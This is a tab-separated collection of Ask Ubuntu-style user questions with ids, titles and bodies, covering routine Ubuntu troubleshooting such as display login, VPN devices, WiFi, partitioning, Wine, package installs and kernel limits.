505364	help me to go gui of ubuntu 12.04	when i entered username and password and pressed enter , it takes me to a terminal saying ... welcome to ubuntu 12.04 lts ( gnu/linux 3.2.0-23 ... ) 674 packages updated . 267 updates are security updates . username @ ubuntu : ~ $ i do n't know how to enter to desktop.can you please help me in telling the commands which i have to type to enter its gui .
505368	how to update libreoffice from 4.2 to 4.3 in ubuntu 14.04.1 lts ?	i want to update my libreoffice ( whole package ) . is there a way to do it without uninstalling old and then installing new ? if there is no option for updating directly , how should i do it otherwise ? p.s . i do n't want to keep the old version .
505372	western digital hard drive crash	i am building a new linux computer with a larger hard drive . i thought that i could install my old western digital hard drive in my new computer , set my new hard drive as my boot drive and after installing linux copy my home folder to the new drive . unfortunately , my old drive is a western digital . the `` smart drive '' firmware interpreted the above as some copyright violation and corrupted the mbr and partition boundaries . using testdisk , i can see that my files are still intact , but the drive firmware wo n't let me repair the damaged mbr and partition boundaries . is there a way to copy the files from my old hard drive to the new one ? testdisk has a `` copy files '' menu command . is there a way to copy the files to a different hard drive ?
505373	how do i uninstall code block completely from ubuntu 14.04 ( including plugins )	i install code block with some plugins .but there is a problem with codeblock . so i want to uninstall codeblock completely so that i can install it from begining with new codeblock window .
505375	tun0 device not available , requires reboot ?	i have configured a vpn connection in gnomes network manager and it does work . i have connected several times already . sometimes however the tun0 devices seems to get lost and then i can not establish the connection . if i reboot my computer then it works again . but i would like to find a solution that does not require a reboot . in the syslog i can see the following information : networkmanager [ 920 ] : < info > starting vpn service 'vpnc ' ... networkmanager [ 920 ] : < info > vpn service 'vpnc ' started ( org.freedesktop.networkmanager.vpnc ) , pid 18398 networkmanager [ 920 ] : < info > vpn service 'vpnc ' appeared ; activating connections networkmanager [ 920 ] : < info > vpn plugin state changed : init ( 1 ) networkmanager [ 920 ] : < info > vpn plugin state changed : starting ( 3 ) networkmanager [ 920 ] : < info > vpn connection 'foobar ' ( connect ) reply received . networkmanager [ 920 ] : < warn > /sys/devices/virtual/net/tun0 : could n't determine device driver ; ignoring ... networkmanager [ 920 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) networkmanager [ 920 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . networkmanager [ 920 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) avahi-daemon [ 936 ] : withdrawing workstation service for tun0 . networkmanager [ 920 ] : < warn > vpn plugin failed : 1 networkmanager [ 920 ] : < info > vpn plugin state changed : stopped ( 6 ) networkmanager [ 920 ] : < info > vpn plugin state change reason : 0 networkmanager [ 920 ] : < info > policy set 'auto eth0 ' ( eth3 ) as default for ipv4 routing and dns . networkmanager [ 920 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . i am not sure if this analysis is correct , but it seems to me that this problem happens when i suspend the computer while the vpn connection is active . i have tried to disable networking in network manager and then reenable it , but that had no effect .
505377	detect connected monitor	i have an ubuntu 12.04 server running with an integrated intel vga . there is a screen connected permanently as an `` info monitor '' . sometimes power is removed from the screen and i want to detect that event . after some research i came across `` ddccontrol '' but it will return no monitor supporting ddc/ci available . i also looked into intel-gpu-tools but found nothing to help me with the monitor status . any ideas ? nik
505378	hp 15 touchsmart notebook pc trackpad does not work . ubuntu 14.04	i just installed ubuntu on an hp 15 touchsmart notebook pc model : 15-d021ca . the trackpad does not work but an external mouse does . xserver-xorg-input-synaptics is already the newest version . the touch screen also does not work for scrolling unless you click on the actual scroll bar . i have tried sudo nano /etc/x11/xorg.conf.d/50-two-finger-scroll-touchsmart-tm2.conf then adding : section `` inputclass '' identifier `` enable synaptics shmconfig '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' driver `` synaptics '' option `` shmconfig '' `` on '' option `` emulatetwofingerminw '' `` 5 '' option `` emulatetwofingerminz '' `` 60 '' option `` verttwofingerscroll '' `` 1 '' option `` horiztwofingerscroll '' `` 1 '' endsection but it wo n't allow me to save it .
505381	how to set apt-get option for a specific source ?	is there a way to set apt-get option only for a specific source ? for example : i 'd like avoid signature check for the packages pulled from a local source . as far as i understood , if create a custom conf file under /etc/apt/pat.conf and include apt : :get : :allowunauthenticated it 'll be applicable to all sources , how do i limit the above single source ? ( eg : /etc/apt/sources.d/myown.list )
505385	webcam video driver	my somikon webcam does n't get noticed by cheese , skype or vlc . lsusb gives me : bus 003 device 003 : id 0ac8:3420 z-star microelectronics corp. venus usb2.0 camera cheese just does n't find it like skype ( no device found ) . vlc recognizes it as /dev/video0 but when i try to capture it , it throws me an error that he ca n't open it . when i go to the system settings and look for input devices he shows the microphone of my webcam as microphone venus usb2.0 camera and i see the input if i speak or make noise . so this should work . the following from here did n't change anything . unload the driver module : sudo modprobe -r uvcvideo then reload with the correct parameter : sudo modprobe uvcvideo quirks=16 my goal is to use the webcam to videochat with skype . if it helps , this is my webcam : http : //www.pearl.de/a-px8185-1341.shtml i use fully updated ubuntu 14.04.1 with 64bit .
505387	freeglut undefined references	can someone help me with the following problem : i wanted to learn to develop graphical applications with freeglut . following a guide on how to get it working on ubuntu , i did the following : sudo apt-get install freeglut3 freeglut3-dev sudo apt-get install build-essential sudo apt-get install binutils-gold when i try to compile some cpp code , i keep on getting undefined reference errors to the glut functions . i tried to google the problem but nothing i saw from google worked . i use the following command to compile : g++ -lgl -lglu -lglut main.cpp i get errors similar to this one : main.cpp : ( .text+0xd98 ) : undefined reference to `glutinit' this error happens happens to all the glut functions used .
505388	concatenate of hostname in script is not working	i have to concatenate the hostname in a file name and ssh it to a machine what i have currently is scp ../output/outputfile50.txt sarah : ~/client/output/outputfile50 $ { hostname } .txt it is working if i run it on terminal but not working if i use it in shell script .
505390	memory utilization increased from 7 % to 72 % in 10 mins . in ubuntu 14.04	i had installed 14.04 recently on my servers . but some of the servers showing wired observations . memory utilization increased from 7 % to 72 % in 10 min . top output is not showing single process utilizing more . but free -m shows 5 gb out of 7 gb is used . node is running on these servers . but even after stopping all node process it does not free up memory . only restart of servers will free up some memory . had seen system logs and kern.log . nut nothing is found .
505395	media control keys on docked dell latitude laptop also changes multiple display settings	i have a dell latitude e6520 . this laptop has keys above the numeric keypad for `` rewind '' , `` play/pause '' , and `` fast forward '' . when the machine is docked with an external monitor , using these keys causes the expected behaviour for the music playing ; however , they also cause changes to my display settings . things that happen when i press these keys : causing the external display to mirror the laptop display disabling the laptop display , the external display , or both ( when the displays are mirrored ) . this behaviour is intermittent , but once it begins while docked , it typically continues at least until the machine is removed from the dock and used elsewhere . probably related : how to prevent displays being mirrored when changing the volume ?
505396	codeblocks default code	code blocks default code option does n't work when i create a new file ( ctrl+alt+n ) .how do i fix that ?
505398	difference between gnome-shell & ubuntu-gnome-desktop	i am running ubuntu 14.04 lts ( 32-bit ) . now i want to install gnome desktop environment ( without removing unity ) . i know i can install by following command : sudo apt-get install gnome-shell sudo apt-get install ubuntu-gnome-desktop but i do n't know exact difference between them . ( may be i 've misunderstanding with them ) so , what is difference between installing gnome by gnome-shell and ubuntu-gnome-desktop ? and which should i use to install gnome desktop environment ?
505401	unable to open a port	i am running gmod on my ubuntu 14.04 64bit vps . there is 2 ports which are needed , port 27005 and port 27015 . port 27015 is open , but 27005 is not open . i have not setup any rules , and i am wondering how to open port 27005 . thanks . the application i want to use is srcds . iptables -l -vn : chain input ( policy accept 221k packets , 17m bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 250k packets , 30m bytes ) pkts bytes target prot opt in out source destination netstat -tunlp | grep :27005 : udp 0 0 0.0.0.0:27005 0.0.0.0 : * 1757/srcds_linux
505402	hardware upgrade renders grub 2 inoperable	i downloaded ubuntu type 12.04 lts when windows xp became extinct & in order to boot back into windows used grub 2 on a disk but following what was described as a hardware update from ubuntu yesterday the grub 2 disk no longer works , anyone know the solution ?
505403	upgrade to 14.04 and keyboard and mouse will not load	i recently upgraded from 13.10 to 14.04 and now i have to unplug the keyboard and mouse and plug them in after the system is booted . i have a razer black widow keyboard and a corsair mouse . my system is a dual boot ubuntu/windows 7 - i7-4770 in a dell xps8700 i have no problem with windows and the usb problem ( i assume it 's a usb problem ) only started after this upgrade . i 'm not very familiar with linux software repairs although i 've used ubuntu for years . i 'd like to continue to use it without wearing out my usb ports
505405	ca n't etablish eth0 connection 14.04	i got a pretty interesting ( maybe a ) bug : first i start my ubuntu 14.04 lts machine . after this i start my lan-router . after login my pc ca n't etablish the connection to my router . i 'm not root so i can not restart the interface , so i restart my machine . after that my machine ca n't etablish the connection , too . only if i restart my router after shutting down my pc i can etablish the connection . on another machine , wich is running 12.04 lts everything workes fine , and before the dist-upgrade from 13.10 i had no problems , too . is this a common problem ? how can i solve the problem ?
505407	i not found gnome 3 taskbar extention settings	i use debian and gnome i add taskbar extention.i setted my taskbar previously .but i not found now . i want found this panel https : //extensions.gnome.org/static/extension-data/screenshots/screenshot_584_23.png
505409	phpinfo ( ) ; in /var/www/html not working	i 'm using netbeans and have lamp installed . now i 'm trying to test the php installation so i configured netbeans to copy the files to the /var/www/html/test_01 folder so the file is in localhost/test_01/index.php when i go there with the browser all i see is a blank page , if i inspect the page i can see this : < ? php phpinfo ( ) ; ? > so my guess is the index.php file is being treated as a .html file . i already tried putting the file in other folders like /var/www/test/index.php without luck .
505414	macchanger not working on ubuntu 14.04	i installed macchanger on ubuntu 14.04 on my macbook air dual booting with os x 10.8.5 . it seems not to work . this is what i do ... $ sudo ipconfig wlan0 down - $ sudo macchanger -r wlan0 when i do that it comes up with ... current - 28:11:22:33:44:55 ( apple ) permanent - 28:11:22:33:44:55 ( apple ) ( that is n't my real mac adress ) how can i fix this ? it 's really important that i can fix this . thank you in advance .
505415	unable to partition ubuntu after installation	installed ubuntu 14.04 against windows 7 . i installed gparted to partition my harddrive since it had occupied entire disk . but , i 'm not able to repartition . note : after installing ubuntu replacing windows 7 , almost 70gb is missing . sudo gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.8 partition table scan : mbr : mbr only bsd : not present apm : not present gpt : not present *************************************************************** found invalid gpt and valid mbr ; converting mbr to gpt format in memory . *************************************************************** disk /dev/sda : 1953525168 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : d7efa26a-1dd8-4c04-833d-0547b9d384d8 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525134 partitions will be aligned on 2048-sector boundaries total free space is 5485 sectors ( 2.7 mib ) number start ( sector ) end ( sector ) size code name 1 2048 1946189823 928.0 gib 8300 linux filesystem 5 1946191872 1953523711 3.5 gib 8200 linux swap sudo fdisk -l /dev/sda disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001f044 device boot start end blocks id system /dev/sda1 * 2048 1946189823 973093888 83 linux /dev/sda2 1946191870 1953523711 3665921 5 extended /dev/sda5 1946191872 1953523711 3665920 82 linux swap / solaris
505420	openmpi error : unknown option “ -- tree-spawn”	i am trying to configure two pc for working with openmpi , i installed openmpi and openssh on the pcs but when i execute : mpirun -np 4 -host slave ./a.out i get : [ slave-901:07002 ] error : unknown option `` -- tree-spawn '' [ master:04772 ] [ [ 61643,0 ] ,0 ] orte_error_log : data for specified key not found in file base/grpcomm_base_xcast.c at line 166
505421	explanation of 70-persistent-net.rules script	i am a newbie in scripting language.i will like to understand a script that was written by someone else.kindly explain to me what this line of script does : if=`cat /etc/udev/rules.d/70-persistent-net.rules | grep $ var | sed 's/^ . *name=// ' | tr -d ' '' '` here is what is in my 70-persistent-net.rules : # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:19.0 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:0b : ab:6a:6b : a9 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:1c.5/0000:03:00.0 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:0b : ab:6a:6b : aa '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 ''
505422	specific webpage ( url ) not loading ( ubuntu 12.04 )	for few days now , i can not load a specific page , which is `` https : //www.facebook.com/ '' alon or with either `` ? ref=logo '' or or `` ? ref=tn_tnmn '' ( which are actually all leading to the same old facebook homepage ) . i am able to load others pages like personal pages of friends , the chat , the notifications-feed of facebook . but the news-feed ( ~= home-page ) wo n't give any result . i 've tried firefox and chromium , with no notable differences . i have flush my dns using sudo /etc/init.d/nscd restart with no notable differences in the behavior as well . i have no particular firewall settings , i do n't use a self maid network , nor specific server , or router different than the one provided by my isp , one which i do n't have root right ( collocation ) . i would like any clue or hint about this problem . prompts that could interest you : iptable -s -p input accept -p forward accept -p output accept route kernel ip routing table destination gateway genmask flags metric ref use iface default freebox-server . 0.0.0.0 ug 0 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 192.168.0.0 * 255.255.255.0 u 1 0 0 eth0 192.168.0.0 * 255.255.255.0 u 2 0 0 wlan0 ifconfig eth0 link encap : ethernet hwaddr 3c:97:0e:51:40 : d5 inet addr:192.168.0.37 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : 2a01 : e35:2ef5:2d70 : dc68:1b24:46c9 : de23/64 scope : global inet6 addr : 2a01 : e35:2ef5:2d70:3e97 : eff : fe51:40d5/64 scope : global inet6 addr : fe80 : :3e97 : eff : fe51:40d5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:81287 errors:0 dropped:0 overruns:0 frame:0 tx packets:53613 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:98941644 ( 98.9 mb ) tx bytes:6023773 ( 6.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:5364 errors:0 dropped:0 overruns:0 frame:0 tx packets:5364 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:552811 ( 552.8 kb ) tx bytes:552811 ( 552.8 kb ) wlan0 link encap : ethernet hwaddr 60:36 : dd:68:45 : e3 inet addr:192.168.0.12 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6236 : ddff : fe68:45e3/64 scope : link inet6 addr : 2a01 : e35:2ef5:2d70:5089:74a0 : c1cd : d849/64 scope : global inet6 addr : 2a01 : e35:2ef5:2d70:6236 : ddff : fe68:45e3/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:2595 errors:0 dropped:0 overruns:0 frame:0 tx packets:158 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:217141 ( 217.1 kb ) tx bytes:25352 ( 25.3 kb ) cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 erictpe330 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters nslookup facebook.com server : 127.0.0.1 address : 127.0.0.1 # 53 non-authoritative answer : name : facebook.com address : 173.252.110.27 thank you !
505425	ca n't figure how to boot to ubuntu on the second drive , just boots to windows	i have about 4 hard drives in my computer and decided to put ubuntu on the 80gb one . i managed to install it , though the hard drive still shows up as empty when i 'm in windows , and i ca n't figure out how to boot it . i did manage to boot once though , when i went to reinstall it after thinking i had n't done it right and exited the installation process once it said that it was already there . i 've tried selecting a boot device in the boot menu but the only way i was able to boot was via exiting the installer from the usb . thanks in advance .
505426	404 error while checking for update	i tried to check for updates in mu ubuntu 14.04 and getting error w : failed to fetch http : //ppa.launchpad.net/jconti/gnome3/ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
505427	is there any reference or material about the preseed file of maas fast installer ?	these days , i have tried to assign ip address to a node using the fast path installer ( curtin ) . in automatic installation procedure , we can assign a ip address to the primary network interface using preseed file . in the case of debian installer , there are some materials how to make preseed files . so , i could assign a ip address using debian installer . but , in fast installer , there are few references about the way to modify fast installer preseed files . i found the adam stoke 's blog , it is very helpful but it did n't make me clear . using preseed files , i 'd like to assign the ip address and download a script files through the specific urls ( late-command , wget ) automatically . so , if there are some materials explaining how to make curtin preseed files , please let me know .
505431	ca n't install packages in lubuntu	i installed lubuntu yesterday and updated it . whenever i run sudo apt-get update and afterwards sudo apt-get install spotify ( for example ) , i get e : impossible to get package `` spotify-client '' ( roughly translated from my native language ) . i have used ubuntu before amongst other distros but this is the first time it happened to me . i had the same error while trying to install filezilla and arandr . any idea on this one ?
505432	`` can not get installation xml '' error while create new domain using php-libvirt	my code is : $ name= '' testmachine '' ; $ arch= '' x86_64 '' ; $ memmb=200 ; $ maxmemmb=500 ; $ vcpus=2 ; $ iso_image= '' /root/centos5-img/centos.5-10.x86.20131020.img '' ; $ disk1 = array ( `` path '' = > `` /var/lib/libvirt/images/mynewvm.img '' , `` driver '' = > `` raw '' , `` bus '' = > `` ide '' , `` dev '' = > `` hdc '' , `` size '' = > `` 500m '' ) ; $ disks = array ( $ disk1 ) ; $ network1 = array ( 'mac ' = > '00:11:22:33:44:55 ' , 'network ' = > 'default' ) ; $ networks = array ( $ network1 ) ; $ flags=vir_domain_disk_access_all ; if ( libvirt_domain_new ( $ conn , $ name , $ arch , $ memmb , $ maxmemmb , $ vcpus , $ iso_image , $ disks , $ networks , $ flags ) ) echo `` success '' ; else echo `` failed - `` .libvirt_get_last_error ( ) . `` < br / > '' ; output : failed - can not get installation xml am new to php-libvirt . kindly say the solution to solve it . thanks in advance .
505433	can not login after ctrl+alt+f1	i pressed ctrl + alt + f1 ( while i was logged in ) and got the console interface . after logging in , i wanted to go back to gui , so i typed startx . it did n't work , so i pressed ctrl + c and logged in and out a couple of times , and repeated the process , after which i typed sudo reboot to reboot computer . after that , ubuntu booted normally , but when i try to log into my account , it just returns me back to the login screen . i entered the console intreface again , tried pressing ctrl + alt + f1 , but in vain . logging in into other accounts including the guest account is successful , but i can not log into my account . fortunately , i have cloned the entire hdd about a month ago , so should i restore the backup , or is there a quick solution ? i 'm not willing to do some advanced programming or so , because it would take much less effort to install some missing updates and some programs after the restore than to mend my system and make it unstable , if it 's seriously broken . i also have all my data backed up on spideroak , so it 's not a problem too . please help . thanks !
505437	wireless keeps disconnecting ubuntu 14.04	this starts to occur after upgrading to ubuntu 14.04 . the only way to solve it is to un-tick `` enable networking '' then enable it again . this works only for a while . i 'd appreciate any help . thanks
505439	`` wifi disabled by hardware switch '' on desktop	i just installed elementaryos on one of my old computers and ca n't get the wifi working . the network-manager ( gui ) shows both installed cards ( atheros ar9227 and ralink 802.11g ) but claims that both are `` disabled by hardware-switch '' . this is strange since i am working on a desktop computer and have never seen any wireless switch on the machine . according to rfkill list one of the cards is not blocked at all : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : phy1 : wireless lan soft blocked : no hard blocked : yes update : the hardware is definitely not disabled . i installed windows xp on the machine and wifi works fine under windows . i then tried installing debian and even could use the wifi-adapter during the installation process ( net-install ) . but once the installation was complete , wifi did n't work again . any idea what is going on ?
505440	how i can resize icons from system tray ?	my system tray now : zeal , spotify , google notifications , skype and many more apps that they have a app indicator by default , has a horror icons with over size . i searched on google , ask ubuntu and others , but nothing . i want the icons to display like below : perfect result , but how ? : how i can configure for get this result ? i 'm at ubuntu 14.04 lts with unity . i tried with dconf as well without result . please , help me and thanks for all !
505441	roguelike platformers available on ubuntu ?	are there any rogue-like side scrolling platformers available on ubuntu ?
505444	bash variable array names and getting values	as you see , i have situation to read values in different arrays , like array1 , array 2 , array3 etc . and i need to print values array1 [ 0 ] , array2 [ 1 ] , like this . i can do it individually like this echo $ { array1 [ 0 ] } but , not able to get the way out here , can some one help . # ! /bin/bash array1= ( w1 w2 w3 ) x=1 var=array $ x [ @ ] echo $ { ! var } echo $ { array1 [ 0 ] } array2= ( w4 w5 w6 ) x=2 var=array $ x [ @ ] echo $ { ! var }
505446	how to install ubuntu 14.04 with raid 1 using desktop installer ?	many people claim that it is impossible to install ubuntu onto raid 1 with the desktop cd . is this really true ? if not , how can it be done ?
505452	grub2 : setting password in version 2.02~beta2-9ubuntu1	i am using ubuntu 14.04 and the grub version is 2.02~beta2-9ubuntu1 . i 've been trying this for a long time . i saw this question but couldnât get it work that way . anyway i have the solution but am not sure if it is correct or if it has any security risks . please suggest . i wanted to configure grub such that : - authentication is required to edit the grub menu or enter rescue mode . authentication is not required to boot the os i followed the ubuntu docs and also many other blogs but all are based on grub2 versions older than 2.02~beta2-9ubuntu1 so the grub script can not be edited as suggested in the docs . following the docs i tried to edit menuentries but each time the issue faced was that : authentication was needed to boot the os too .
505454	what should i use my ssd for ?	i am setting up a small ( 1 user ) email server . so far i have put in 2 x 1tb wd red drives and set them up for lvm with raid1 mirrored lvs . i also picked up a 120gb samsung 840 evo but i ca n't figure out what to use it for . i read that they recently added ssd caching to lvm in kernel mainline but i imagine it will be a year or two before that reaches ubuntu . what should i use it for then ? should i get a second one for raid so i can move the root ( non-home ) files to it for faster performance ?
505458	upgrade to 13.04 from 12.10 without quantal repo	i have recently been made a temporary owner of an old 12.10 ubuntu machine so i can upgrade it to the latest ( 14.04 ) . so i am trying to upgrade to the 13.04 as per ubuntu website , and from there to 14.04 , but i seemed to have run into the apt-get bug : root @ camolls1000774583 : /etc/apt # do-release-upgrade checking for a new ubuntu release your ubuntu release is not supported anymore . for upgrade information , please visit : http : //www.ubuntu.com/releaseendoflife traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 145 , in < module > fetcher.run_options += [ `` -- mode= % s '' % options.mode , attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options' i googled around , apparently the fix was pushed in a upgrade and was placed in quantal repo . but when i tried to run apt-get update and apt-get upgrade all my quantal repos came back as 404 not found or ignored . i am guessing since quantal is eol they took away the repo . so how do i upgrade to raring without quantal repo ? i have also attached a copy of my sources.list in case that helps . i ca n't nuke it . i need the user 's data intact . thanks edited for additional clarification .
505459	sync packages among ubuntu ( s )	i have a number of ubuntu computers . i 'd like to sync among my computers all .deb packages installed via apt-get install . there were a way before using an ubuntu one account and ubuntu software center . nevertheless , this service is no longer available . my question is if there is a similar way to share .deb packages among my computers in a similar way than before with ubuntu one .
505462	apt-get says up to date , errors say no update log ?	i am on a relatively fresh install of ubuntu 14.04 , but i have updated and upgraded with apt-get multiple times . the software updater confirms that i everything is up to date . but i frequently have various applications crashing , and in the crash report dialog windows it says that there is no update log on my system and that i am probably on a fresh install . it this common ? is there anything i can do ?
505463	have clang 3.4. , need clang 2.9	i installed the default version of clang and llvm in my ubuntu 14.04 and it 's version 3.4 . that 's nice , but for some legacy stuff i need version 2.9 . ideally , i could install both version in parallel and use them with `` clang-3.4 test.c '' and `` clang-2.9 test.c '' while choosing which version a plain `` clang test.c '' refers to by default . indeed , the package for `` clang '' appears to be only 50kb in size , so something is going on . question : how can i have several version of clang installed in parallel ? llvm makes binaries for version 2.9 available on its website : http : //llvm.org/releases/download.html # 2.9 thanks .
505464	trying to install libncurses dev package for ubuntu 14.04	i am trying to install libncurses for ubuntu 14.04 . but , it is showing the following error : root @ sharwaridell : /usr/src # sudo apt-get install libncurses5-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libncurses5-dev
505466	open file limit	i 'm trying to increase open file limit in ubuntu 8.04.4 lts . followed information posted in this question : how do i increase the open files limit for a non-root user ? added to /etc/sysctl.conf following line : fs.file-max=500000 added to /etc/security/limits.conf following lines : * soft nofile 10000 * hard nofile 10000 added to /etc/pam.d/common-session ( my system do not have any other files prefixed with common-session at /etc/pam.d/ ) following line : session required pam_limits.so did system restart but the value of open file limit is still same 1024 : # ulimit -n 1024 # cat /proc/ { pid } /limits limit soft limit hard limit units max open files 1024 1024 files # cat /proc/sys/fs/file-max 500000 # sysctl fs.file-max fs.file-max = 500000 what i 'm doing wrong and how to increase open file limit ?
505469	ubuntu on samsung chromebook 2	i would like to load ubuntu on an inexpensive 13 '' laptop with long battery life . i have been looking at chromebooks , but i do not find any certified by canonical . what is the consensus on the viability of this approach ? i am particularly thinking about the samsung chromebook 2 13.3 '' . tia , david .
505470	cairo-dock crashed my unity desktop , is this possible ?	i 'm still new to using ubuntu and learning more and more each day . the other day i formatted my hard drive and wiped the windows 8 partition ( never use it ) and re-installed my ubuntu install to start fresh . any way , i installed cairo-dock , thinking that i would give it a try after installing . after using it for a bit i shut computer down , and came back later to turn it on , and the unity desktop was n't loading . is this a common problem with cairo or just a bug in ubuntu all together ? after i did the fix in the terminal cairo was n't working properly , so i just removed it all together - i did n't want to waste time with it . i would rather have my computer running .
505471	eclipse does not start on 14.04	i recently upgraded to ubuntu 14.04 and have been trying to install and use eclipse ever since . i tried using both open jdk as well as oracle jdk installations ( both java 7 and java8 ) and both eclipse juno as well eclipse luna . i even tried installing eclipse from aptitude installer . all of them stop on the flash screen that eclipse loads and start and hangs there . if any of you have faced similar problems and were able to get around this , please let me know . i tried running the eclipse -debug option to see if there are any errors on the console but nothing showed up . thanks & regards , nachiketh
505473	is it a good idea to install 'fglrx ' proprietary driver in portable ubuntu x64 ?	i just installed ubuntu x64 in my external hard disk , which i will be using in different systems . now , because my laptop , in which i do most of my work , have a very peculiar configuration ( shown below ) , i want to install `` fglrx '' ( amd proprietary driver ) driver in it , to maximize its battery backup and graphics performance ( proven ) . so , i want to ask you guys if this is a good idea to install proprietary driver ( s ) in my such a portable linux ? my laptop : amd a8-4500m , amd radeon hd 7640g + 7670m , 4gb ram 500gb hdd
505477	asus g74 blocking ubuntu lts install	i am trying to install ubuntu lts on my laptop ( asus g74 ) , but when i select the usb drive i 'm using , a black screen with white text appears . it says something wn-block at the top .
505483	wine issue , quit working	update looking around in the faq i found `` 10.6 . every app i try to start crashes '' http : //wiki.winehq.org/faq # head-7c6623cfe3fb6b542f4b0d97bea78ce682c7c16c i was not able to recover my wine installation and had to remove it then reinstall . all is good now , thanks ========= original post =========================================== i have been using wine 1.6 for running several old windows xp applications . last night i tried to install a old win98 app and seem to have broken something . i changed the `` default '' compatibility mode to `` win98 '' in the configure wine window and exited out . the n tried to right click on the .exe file to use install wine application from the pop-up menu . wine never launched the install . when i tried to go back to `` configure wine '' it even failed to open and then to my shock i found that my other three windows xp applications that worked prior to this all failed to launch . doing some research i tried launching winecfg from the command line and it failed with an error with something about .idt failed to invoke . so my question is how can i undo or fix my horrible mistake ? is there a way to force the wine mode back to winxp ? edit to add following per a suggestion i tried `` winetricks winxp '' , but nothing happened , it just hung until i , then i got the following gerald @ gerald-vostro-200 : ~ $ winetricks winxp wine cmd.exe /c echo ' % programfiles % ' returned empty string at command line i tried > winecfg ... ... and i got the following ( see below ) =========================================================================== gerald @ gerald-vostro-200 : ~ $ winecfg modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument ^c ( i tried to cancle / close the hung up process ) err : ntdll : rtlpwaitforcriticalsection section 0x7bcc7be0 `` loader.c : loader_section '' wait timed out in thread 0024 , blocked by 0009 , retrying ( 60 sec ) ^c err : ntdll : rtlpwaitforcriticalsection section 0x7bcc7be0 `` loader.c : loader_section '' wait timed out in thread 0025 , blocked by 0009 , retrying ( 60 sec ) ^c err : ntdll : rtlpwaitforcriticalsection section 0x7bcc7be0 `` loader.c : loader_section '' wait timed out in thread 0026 , blocked by 0009 , retrying ( 60 sec ) err : seh : raise_exception unhandled exception code c0000194 flags 0 addr 0x7bc367d1 err : ntdll : rtlpwaitforcriticalsection section 0x7bcc7be0 `` loader.c : loader_section '' wait timed out in thread 0024 , blocked by 0009 , retrying ( 60 sec ) ^c err : seh : raise_exception unhandled exception code c000013a flags 0 addr 0xf77d3430 gerald @ gerald-vostro-200 : ~ $
505484	there 's no battery indicator in ubuntu 14.04 lts ?	i have a really annoying problem with battery indicator on my ubuntu 14.04 lts . if the laptop is connected to its power supply , the indicator works fine and shows the progress of charging and also discharging after i disconnect the power supply . however , if i then restart the laptop on battery , there is no battery indicator anymore ( which is really annoying on a laptop ... ) . it will return though once i connect it again to the power supply ... i have already reinstalled the service and tried several other fixes ( seems to be a common problem ... ) from the web but so far nothing has really worked yet . here is a screenshot of power settings : .
505489	black screen , os not booting	i have dual boot of win8.1 and ubuntu 14.04 . i tried to recover my write protected pendrive with diskmgr on win cmd . i failed and now ca n't start pc on win or ubuntu . a black screen coming before boot or grub menu come . the black screen containing nothing but a _ ( underscore ) . please help . here is image links to be clear https : //www.dropbox.com/s/lf5bxkyr5g0g1eb/img_20140801_204930.jpg and here is the current status . https : //www.dropbox.com/s/28y6itwu37265p7/img_20140801_204802.jpg
505491	repacking a kernel	i am trying to pack up my server kernel i made with the packages downloaded and web page files all included . basically this will allow me to put the same distro i have made on my dev board onto other boards . i have never done this before so i need some help . everything i run into is talking about repacking for phones . not sure if it is the same process or if i am even researching the right thing . this is on an embedded device not a full linux machine . not sure if that matters . i am running ubuntu 12.04 . i have no gui only command-line . so instructions or guide for that will be best suited . i was told that you can do a method of extracting the kernel with u-boot on another machine and connecting to the embedded device via internet and ip address . ( just a thought do n't need to use this method if there is another way )
